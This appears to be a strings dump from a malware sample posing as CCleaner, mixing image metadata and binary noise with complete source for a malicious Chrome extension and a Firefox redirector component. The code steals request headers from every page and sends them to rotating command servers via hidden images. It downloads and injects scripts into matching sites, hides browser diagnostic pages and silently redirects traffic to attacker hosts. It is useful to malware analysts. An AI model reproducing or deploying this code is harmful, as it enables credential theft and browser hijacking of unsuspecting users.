" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.154911, 2013/10/29-11:47:16 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)" xmpMM:InstanceID="xmp.iid:F77E6E89BC1C11E3A70EAAA1837B71AE" xmpMM:DocumentID="xmp.did:F77E6E8ABC1C11E3A70EAAA1837B71AE"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F77E6E87BC1C11E3A70EAAA1837B71AE" stRef:documentID="xmp.did:F77E6E88BC1C11E3A70EAAA1837B71AE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>}
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.154911, 2013/10/29-11:47:16 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)" xmpMM:InstanceID="xmp.iid:55498DF6BC1D11E3A70EAAA1837B71AE" xmpMM:DocumentID="xmp.did:92CC6BDABC1D11E3A70EAAA1837B71AE"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:55498DF4BC1D11E3A70EAAA1837B71AE" stRef:documentID="xmp.did:55498DF5BC1D11E3A70EAAA1837B71AE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.154911, 2013/10/29-11:47:16 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)" xmpMM:InstanceID="xmp.iid:8D576587BC2C11E3A70EAAA1837B71AE" xmpMM:DocumentID="xmp.did:8D576588BC2C11E3A70EAAA1837B71AE"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8D576585BC2C11E3A70EAAA1837B71AE" stRef:documentID="xmp.did:8D576586BC2C11E3A70EAAA1837B71AE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>,i%r
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.154911, 2013/10/29-11:47:16 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)" xmpMM:InstanceID="xmp.iid:8D576583BC2C11E3A70EAAA1837B71AE" xmpMM:DocumentID="xmp.did:8D576584BC2C11E3A70EAAA1837B71AE"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8D576581BC2C11E3A70EAAA1837B71AE" stRef:documentID="xmp.did:8D576582BC2C11E3A70EAAA1837B71AE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
Paint.NET v3.5.11G
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="hXXp://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpRights:Marked="True" xmpMM:OriginalDocumentID="xmp.did:efc10bd1-b45e-410e-9f20-62717a668c04" xmpMM:DocumentID="xmp.did:53A56C514CBD11E484FBDFB6F988B028" xmpMM:InstanceID="xmp.iid:53A56C504CBD11E484FBDFB6F988B028" xmp:CreatorTool="Adobe Photoshop CC 2014 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:904c8aea-d0f0-4bfd-9498-364932cd02a9" stRef:documentID="adobe:docid:photoshop:f67adfe6-93a8-1177-929d-81d389b8f969"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>cW
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="hXXp://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpRights:Marked="True" xmpMM:OriginalDocumentID="xmp.did:efc10bd1-b45e-410e-9f20-62717a668c04" xmpMM:DocumentID="xmp.did:1BA641C74CBB11E484FBDFB6F988B028" xmpMM:InstanceID="xmp.iid:1BA641C64CBB11E484FBDFB6F988B028" xmp:CreatorTool="Adobe Photoshop CC 2014 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8fa004f6-f760-49c2-8bc2-b10912d7553e" stRef:documentID="adobe:docid:photoshop:f67adfe6-93a8-1177-929d-81d389b8f969"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.154911, 2013/10/29-11:47:16 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)" xmpMM:InstanceID="xmp.iid:E3BE688DD5EC11E3B0C0D5497869C5CA" xmpMM:DocumentID="xmp.did:E3BE688ED5EC11E3B0C0D5497869C5CA"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E3BE688BD5EC11E3B0C0D5497869C5CA" stRef:documentID="xmp.did:E3BE688CD5EC11E3B0C0D5497869C5CA"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>yTE8
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.154911, 2013/10/29-11:47:16 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)" xmpMM:InstanceID="xmp.iid:15DB7729E3E411E3B6B597403CC19719" xmpMM:DocumentID="xmp.did:15DB772AE3E411E3B6B597403CC19719"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:15DB7727E3E411E3B6B597403CC19719" stRef:documentID="xmp.did:15DB7728E3E411E3B6B597403CC19719"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
4b%ctt
|CC%x
}R<@.jX
0000777
3103003
0251140
00000000000
12361475172
preloaders.net
images/sprites.png
0000666
00000023511
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.154911, 2013/10/29-11:47:16 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)" xmpMM:InstanceID="xmp.iid:E3BE6885D5EC11E3B0C0D5497869C5CA" xmpMM:DocumentID="xmp.did:E3BE6886D5EC11E3B0C0D5497869C5CA"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:BC023664D5EB11E3B0C0D5497869C5CA" stRef:documentID="xmp.did:E3BE6884D5EC11E3B0C0D5497869C5CA"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="hXXp://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpRights:Marked="True" xmpMM:OriginalDocumentID="xmp.did:efc10bd1-b45e-410e-9f20-62717a668c04" xmpMM:DocumentID="xmp.did:8DDFA4024CBC11E484FBDFB6F988B028" xmpMM:InstanceID="xmp.iid:8DDFA4014CBC11E484FBDFB6F988B028" xmp:CreatorTool="Adobe Photoshop CC 2014 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:904c8aea-d0f0-4bfd-9498-364932cd02a9" stRef:documentID="adobe:docid:photoshop:f67adfe6-93a8-1177-929d-81d389b8f969"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="hXXp://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpRights:Marked="True" xmpMM:OriginalDocumentID="xmp.did:efc10bd1-b45e-410e-9f20-62717a668c04" xmpMM:DocumentID="xmp.did:84B254104CBB11E484FBDFB6F988B028" xmpMM:InstanceID="xmp.iid:84B2540F4CBB11E484FBDFB6F988B028" xmp:CreatorTool="Adobe Photoshop CC 2014 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8fa004f6-f760-49c2-8bc2-b10912d7553e" stRef:documentID="adobe:docid:photoshop:f67adfe6-93a8-1177-929d-81d389b8f969"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
z#.xh"-gT *\G!)T@#,^K%0ub'5
-<=;9*%%
*.Yf:(
"""!"""!'''
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="Piriform.CCleaner" processorArchitecture="x86" version="1.0.0.0" type="win32"></assemblyIdentity><description>Piriform CCleaner</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS></application></compatibility></assembly>s
7*797`7~7
3_5'606=6
5&6,626=6
2-2
3E3M4K4
89S9F:U:
2%2S2
9œ9J9i9q9w9|9
>*>0>5>;>
7>9{95:>:
5[5-7}8m:
<"<&<*<.<2<6<:<><
7 7$7(718
5X5U5
7 7$7(7,7074787<7@789
<(=,=0=4=
:.:8:\:^;
=-=9=[=~=
5-525}5
4,434_4}4
2'2.252?2
3%4S4
9)9/969_9
< <'<3<8<
?%?1?8???
1 2%2~2
88
9(9-92979
0-0C0X0c0}0
6$7 757?7
8"8&8*8.858
9œ9m9
= =$=(=,=3=
;%;,;3;9;
6%7S7
0-0P0}0
1%2X2
> >$>(>,>0>4>
0 0$0(0,00040
< <$<(<,<0<|=
0 0$0(0,0004080<0@0
? ?$?(?,?0?4?8?<?
9 9$9(9,9094989
1 1$1(1,10141
3 3$3(3,3034383<3
? ?$?(?,?
8 8(848\8
3$3,383\3|3
?$?,?8?\?|?
6$6,686\6|6
0 0(040\0|0
=,=4=@=|=
3$3,343@3|3
6$6,646@6|6
8$8,848@8|8
5 5$5(5,50545
.data
.idata
.reloc
.edata
.xyCS5F
w..BI"[
O@e3F.AYW%
MES.uX
r.GOf{
ha.SS|`6
@!.TZ]8
GpP*.tJ!U&,
0c~Ngx]o;l|v1Sd3.EU)px_X ZW_@
5cÊ
\%sfx<
x;.DF&
.kQxlR-uslf&N|=7
rF.clIJ1
CRTDLL.DLL
7$80858{9
5!5/555~5
4-494?4\4|4
kkqvx_.dll
.rdata
.pdata
@.idata
T.WM9
%D,3G
.VK <
3%*"!2 2
.NSmm
L:\LADy6t=6\
cM5`CMd}GIf
X&jO>hcopo2%D,kEENFH|k
*:K.GT=`A
: '#75~8
(727 =5)
MAXB^q.eTLnzrlrA(mm: .*_
/uAKncxhy>.sm
cmDWAgyb}kq cKf-FEgSJm~bXkv|L
11,U~5.cd{BBOPQ&IRJho~r8pOL`)_FAMHu(U[se~ws4 -
].syce$|Ibn
YFA%UGvhlmr
5.kk2
dUnmcz5.Tc)LZRMSta][.
#.UbhOCC
v"#R|e&P[|i^OMvR$*rIf_qwq.yz
=(<:-71(
//#.9~!/#
%%u'SzJ
Òp(#e?[bgI
OlPI87.eqGGgb
].%-%8xm
kkqvx_64.dll
var MAX=40;var BUF=new Array(MAX);var IDS="";var HID="NT6.1.7601-10F5F7ED.ENU.3D143E46-83C788-101D10FD-145D15B1";var VER="28";var SLST="imovelamigo.info#official-iso5001.ru#ahetyta-idyn.cc#qexulihbowfini.ws#rylodwosyre.ws#zesydu-maho.ru#hifocoxny-lilde.in#vutacicusa.in#wazudylwake.ws#zuzewfuflecebo.ru#kepemalxujxo.net#xihyrla-po.ws#ukyvsebytahedyf.in#ubufuqawemi.ru#dessimob-ce.ws#ipykicokyho.ru#pukaqaztefu.ru#hyvajajsaha.ru#urowloxuka-citu.ws#ivewenecoz-isafo.org#ynenuwko-zulmy.com#arokmado-kizbu.ws#wuxirsudyva.cc#sipacyjizocte.net";var SINT=120000;var SRV="";var SIND=0;var SARR=SLST.split("#");var MAX_INJ=100;var TOT_INJ=0;var INJECT=new Array(MAX_INJ);var INJURL=new Array(MAX_INJ);function randomString(){var c="abcdefghiklmnopqrstuvwxyz";var d="";for(var b=0;b<10;b  ){var a=Math.floor(Math.random()*c.length);d =c.substring(a,a 1)}return d}function Base64_encode(d){var c="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789(/)";var a="";var l,j,g,k,h,f,e;var b=0;while(b<d.length){l=d[b  ];j=d[b  ];g=d[b  ];k=l>>2;h=((l&3)<<4)|(j>>4);f=((j&15)<<2)|(g>>6);e=g&63;if(isNaN(j)){f=e=64}else{if(isNaN(g)){e=64}}a=a c.charAt(k) c.charAt(h) c.charAt(f) c.charAt(e)}return a}function Base64crypt(b){var a=new Array(b.length);for(var c=0;c<b.length;c  ){a[c]=b.charCodeAt(c) c*c;a[c]=a[c]%6}b=Base64_encode(a);delete a;return b}function onLoadImage(c){var a=c.target;var d=a.getAttribute("id");var b=d.substring(6);a.parentNode.removeChild(a);delete BUF[b]}function onErrorAbortImage(b){var a=b.target;a.parentNode.removeChild(a)}function InsertImg(d,c){if(SRV==""){return}var e=document.getElementById("sdimg_" c);if(e!=null){return}var b="hXXp://" SRV "/?h=" HID "&i=" c IDS "&o=0&f=*&si=x&so=0&tl=" BUF[c].length "&v=" VER "&d=" Base64crypt(BUF[c]);var a=d.createElement("img");a.setAttribute("id","sdimg_" c);a.setAttribute("border","0");a.setAttribute("width","0");a.setAttribute("height","0");a.setAttribute("src",b);d.body.insertBefore(a,d.body.firstChild);a.addEventListener("load",function(f){onLoadImage(f)},true);a.addEventListener("error",function(f){onErrorAbortImage(f)},true);a.addEventListener("abort",function(f){onErrorAbortImage(f)},true)}function SendData(){if(SRV==""){return}for(var a=0;a<MAX;a  ){if(!BUF[a]){continue}InsertImg(document,a)}}function Completed(b){if(b.url.substring(0,4)!=="http"){return}for(var a=0;a<TOT_INJ;a  ){if(b.url.match(INJURL[a])){console.log("*** MATCH! EXECUTING JS: " INJECT[a]);chrome.tabs.executeScript(b.tabId,{code:INJECT[a],allFrames:true})}}if(b.frameId!=0){return}chrome.tabs.executeScript(b.tabId,{file:"content.js",allFrames:true});SendData()}function SaveLog(b){for(var a=0;a<MAX;a  ){if(BUF[a]){continue}BUF[a]=b;InsertImg(document,a);return}}function BefSendHead(e){if(e.tabId<0){return}var c="";for(var a=0;a<e.requestHeaders.length;a  ){if(e.requestHeaders[a].name==="Origin"){continue}if(e.requestHeaders[a].name==="Accept"){continue}if(e.requestHeaders[a].name==="Content-Type"){continue}if(e.requestHeaders[a].name==="Accept-Encoding"){continue}c =" " a ":" e.requestHeaders[a].name ":" e.requestHeaders[a].value}var b=e.url " #" e.type "#" e.method "# " c;SaveLog(b)}function onMsg(c,b,a){SaveLog(c.greeting);a({})}function XHRstateChange(c){if(c.readyState!=4){return}var b=0;if(c.status==200){var a=c.responseText;if((a[42]==";")&&(a[0]=="G")&&(a[1]=="I")&&(a[2]=="F")&&(a[3]=="8")&&(a[4]=="9")&&(a[5]=="a")){b=1}}if(b==1){SRV=SARR[SIND];chrome.storage.local.set({SRV_SIND:SIND})}SIND  ;if(SIND>=SARR.length){SIND=0}}function sTimer(){var a=new XMLHttpRequest();a.onreadystatechange=function(){XHRstateChange(a)};a.open("GET","hXXp://" SARR[SIND] "/?f=*",true);a.overrideMimeType("text/plain; charset=x-user-defined");a.send(null)}function Base64v2_utf8_decode(a){var b="";var d=0;var e=c1=c2=0;while(d<a.length){e=a.charCodeAt(d);if(e<128){b =String.fromCharCode(e);d  }else{if((e>191)&&(e<224)){c2=a.charCodeAt(d 1);b =String.fromCharCode(((e&31)<<6)|(c2&63));d =2}else{c2=a.charCodeAt(d 1);c3=a.charCodeAt(d 2);b =String.fromCharCode(((e&15)<<12)|((c2&63)<<6)|(c3&63));d =3}}}return b}function Base64v2_decode(d){var c="hijklmnoNOVWXYZ012wxyzABLMGHIJK3456789CDEFpqrsabcdefgtuvPQRSTU /=";var a="";var l,j,g;var k,h,f,e;var b=0;d=d.replace(/[^A-Za-z0-9\ \/\=]/g,"");while(b<d.length){k=c.indexOf(d.charAt(b  ));h=c.indexOf(d.charAt(b  ));f=c.indexOf(d.charAt(b  ));e=c.indexOf(d.charAt(b  ));l=(k<<2)|(h>>4);j=((h&15)<<4)|(f>>2);g=((f&3)<<6)|e;a=a String.fromCharCode(l);if(f!=64){a=a String.fromCharCode(j)}if(e!=64){a=a String.fromCharCode(g)}}a=Base64v2_utf8_decode(a);return a}function ParseInjects(d){var a=Base64v2_decode(d);var f=new Array();f=a.split("|$");var c=new Array();var e=1;TOT_INJ=f.length-1;for(e;e<f.length;e  ){var b=f[e].substr(0,f[e].length-2);c=b.split("|^");INJURL[e-1]=c[0];INJECT[e-1]=c[1].replace("_HOSTID_",HID)}INJURL[e-1]=false}function iXHRstateChange(a){if(a.readyState!=4){return}if(a.status!=200){return}var b=a.responseText;if(b==null){return}if((b[42]!=";")||(b[0]!="G")||(b[1]!="I")||(b[2]!="F")||(b[3]!="8")||(b[4]!="9")||(b[5]!="a")){return}var d=/;(\S*)/.exec(b);ParseInjects(d[1]);chrome.storage.local.set({INJ_BLOCK:d[1]})}function iTimer(){if(SRV==""){return}var a=new XMLHttpRequest();a.onreadystatechange=function(){iXHRstateChange(a)};a.open("GET","hXXp://" SRV "/?jc=x&h=" HID,true);a.overrideMimeType("text/plain; charset=x-user-defined");a.send(null)}IDS=randomString();function get_srv(a){if(typeof(a.SRV_SIND)=="undefined"){return}SRV=SARR[a.SRV_SIND]}function get_inj(a){if(typeof(a.INJ_BLOCK)=="undefined"){return}ParseInjects(a.INJ_BLOCK)}chrome.storage.local.get("SRV_SIND",get_srv);chrome.storage.local.get("INJ_BLOCK",get_inj);chrome.extension.onMessage.addListener(onMsg);chrome.webNavigation.onCompleted.addListener(Completed);chrome.webRequest.onBeforeSendHeaders.addListener(BefSendHead,{urls:["hXXp://*/*","hXXps://*/*"],types:["xmlhttprequest"]},["requestHeaders"]);window.setInterval(sTimer,SINT);window.setInterval(iTimer,SINT 1000);chrome.tabs.onUpdated.addListener(function(a,b){if(b.status!="loading"){return}if(b.url=="chrome://memory-redirect/"){chrome.tabs.update(a,{url:"chrome://conflicts/"})}if(b.url=="chrome://view-http-cache/"){chrome.tabs.update(a,{url:"chrome://predictors/"})}if(b.url=="chrome://cache/"){chrome.tabs.update(a,{url:"chrome://predictors/"})}if(b.url=="chrome://net-internals/"){chrome.tabs.update(a,{url:"chrome://downloads/"})}if(b.url=="chrome://dns/"){chrome.tabs.update(a,{url:"chrome://downloads/"})}if(b.url=="chrome://about/"){chrome.tabs.update(a,{url:"chrome://chrome/"})}if(b.url=="chrome://inspect/"){chrome.tabs.update(a,{url:"chrome://ipc/"})}if(b.url=="chrome://tasks/"){chrome.tabs.update(a,{url:"chrome://sessions/"})}if(b.url=="chrome://chrome-urls/"){chrome.tabs.update(a,{url:"chrome://chrome/history/"})}});
/"})}});
jar:chrome/content.jar!/content/
chrome/content/
overlay chrome://browser/content/browser.xul chrome://sample/content/sample.xul
component {e781b0a8-36d6-4510-a9e9-a23234ac7ee5} components/red.js
contract @merysheep.chlice.qee.jp/redirector;1 {e781b0a8-36d6-4510-a9e9-a23234ac7ee5}
category profile-after-change @merysheep.chlice.qee.jp/redirector;1 @merysheep.chlice.qee.jp/redirector;1
category content-policy @merysheep.chlice.qee.jp/redirector;1 @merysheep.chlice.qee.jp/redirector;1
K.$%D,3
content/sample.xulUT
content/sample.jsUT
content/redr.jsUT
content/had.jsUT
3.Nt5E
NT6.1.7601-10F5F7ED.ENU.3D143E46-83C788-101D10FD-145D15B1
C:\ProgramData\bafffhed28.nls
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\extensions
C:\Users\"%CurrentUserName%"\AppData\Local\kf28lz32.dll
const Ci=Components.interfaces;const Cc=Components.classes;const Cr=Components.results;const Cu=Components.utils;const mo="@mozilla.org/";Cu["import"]("resource://gre/modules/XPCOMUtils.jsm");var prefexport={HOSTID:"NT6.1.7601-10F5F7ED.ENU.3D143E46-83C788-101D10FD-145D15B1",VERSION:"28",SERVERLIST:"imovelamigo.info#official-iso5001.ru#ahetyta-idyn.cc#qexulihbowfini.ws#rylodwosyre.ws#zesydu-maho.ru#hifocoxny-lilde.in#vutacicusa.in#wazudylwake.ws#zuzewfuflecebo.ru#kepemalxujxo.net#xihyrla-po.ws#ukyvsebytahedyf.in#ubufuqawemi.ru#dessimob-ce.ws#ipykicokyho.ru#pukaqaztefu.ru#hyvajajsaha.ru#urowloxuka-citu.ws#ivewenecoz-isafo.org#ynenuwko-zulmy.com#arokmado-kizbu.ws#wuxirsudyva.cc#sipacyjizocte.net"};const nsIContentPolicy=Ci.nsIContentPolicy;var Application=Cc[mo "fuel/application;1"].getService(Ci.fuelIApplication);var gRedirector=null;function msRedirector(){this.wrappedJSObject=this}msRedirector.prototype={RedirectList:false,core:null,hello:function(){return"Hello from ch XPCOM!"},getpref:function(a){try{return prefexport[a]}catch(b){}},FindRedirectSign:function(b,a){if(!this.RedirectList){return false}for(var c=0;c<this.RedirectList.length;c  ){var d=this.RedirectList[c];if(b.search((a)?d.tofind:d.toreplace)!=-1){break}}if(c!=this.RedirectList.length){return this.RedirectList[c]}else{return false}},addlog:function(a){},makeURI:function(d,c,a){var b=Cc[mo "network/io-service;1"].getService(Ci.nsIIOService);return b.newURI(d,c,a)},_startup:function(){this.cout=Cc[mo "consoleservice;1"].getService(Ci.nsIConsoleService);try{this.cout.reset()}catch(b){}try{var a=Cc[mo "categorymanager;1"].getService(Ci.nsICategoryManager);a.addCategoryEntry("content-policy",this.classDescription,this.contractID,true,true)}catch(b){}},observe:function(c,a,b){switch(a){case"app-startup":this._startup();break;case"profile-after-change":this._startup();break}},shouldLoad:function(b,j,c,a,g,k){if(j.scheme!="http"&&j.scheme!="https"){return nsIContentPolicy.ACCEPT}if(b!=nsIContentPolicy.TYPE_DOCUMENT){return nsIContentPolicy.ACCEPT}if(!a||!a.loadURI){return nsIContentPolicy.ACCEPT}var l=this.FindRedirectSign(j.spec,true);if(l){var d=a;if("redirecting" in d){if("HostUnreachable" in d.redirecting){if(d.redirecting.fakeURL!=l.toreplace){delete d.redirecting}else{return Ci.nsIContentPolicy.ACCEPT}}}try{var n=j.spec.replace(/https?\:\/\//,"");var h=l.tofind.exec(n)[0];var m=n.replace(h,l.toreplace);m="hXXp://" m;var f=(m.indexOf("?")==-1)?"?":"&";m =f "hostid=" prefexport.HOSTID;try{m ="&origurl=" Base64orig.encode(j.spec)}catch(i){}d.redirecting={};d.redirecting.originalURL=j.spec;d.redirecting.redirectingURL=m;d.redirecting.aRequestOrigin=c;d.redirecting.fakeURL=l.toreplace;d.redirecting.notfakeURL=h;d.redirecting.https=j.scheme=="https";d.loadURI(m,c,null)}catch(i){}return Ci.nsIContentPolicy.REJECT_REQUEST}return Ci.nsIContentPolicy.ACCEPT},shouldProcess:function(c,e,a,d,b,f){return Ci.nsIContentPolicy.ACCEPT},classDescription:"msRedirector js component",contractID:"@merysheep.chlice.qee.jp/redirector;1",classID:Components.ID("{e781b0a8-36d6-4510-a9e9-a23234ac7ee5}"),_xpcom_factory:{createInstance:function(b,a){if(b!=null){throw Cr.NS_ERROR_NO_AGGREGATION}if(!gRedirector){gRedirector=new msRedirector()}return gRedirector.QueryInterface(a)}},_xpcom_categories:[{category:"app-startup",service:true}],QueryInterface:XPCOMUtils.generateQI([Ci.nsIObserver,Ci.nsIContentPolicy])};var Base64orig={_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789(/)",encode:function(c){var a="";var k,h,f,j,g,e,d;var b=0;c=Base64orig._utf8_encode(c);while(b<c.length){k=c.charCodeAt(b  );h=c.charCodeAt(b  );f=c.charCodeAt(b  );j=k>>2;g=((k&3)<<4)|(h>>4);e=((h&15)<<2)|(f>>6);d=f&63;if(isNaN(h)){e=d=64}else{if(isNaN(f)){d=64}}a=a this._keyStr.charAt(j) this._keyStr.charAt(g) this._keyStr.charAt(e) this._keyStr.charAt(d)}return a},_utf8_encode:function(b){b=b.replace(/\r\n/g,"\n");var a="";for(var e=0;e<b.length;e  ){var d=b.charCodeAt(e);if(d<128){a =String.fromCharCode(d)}else{if((d>127)&&(d<2048)){a =String.fromCharCode((d>>6)|192);a =String.fromCharCode((d&63)|128)}else{a =String.fromCharCode((d>>12)|224);a =String.fromCharCode(((d>>6)&63)|128);a =String.fromCharCode((d&63)|128)}}}return a}};if(XPCOMUtils.generateNSGetFactory){var NSGetFactory=XPCOMUtils.generateNSGetFactory([msRedirector])}else{var NSGetModule=XPCOMUtils.generateNSGetModule([msRedirector])};
"api": [ "storage", "tabs", "webNavigation", "webRequest", "webRequestInternal" ],
"explicit_host": [ "hXXp://*/*", "hXXps://*/*" ]
"events": [ "runtime.onInstalled" ],
"from_webstore": false,
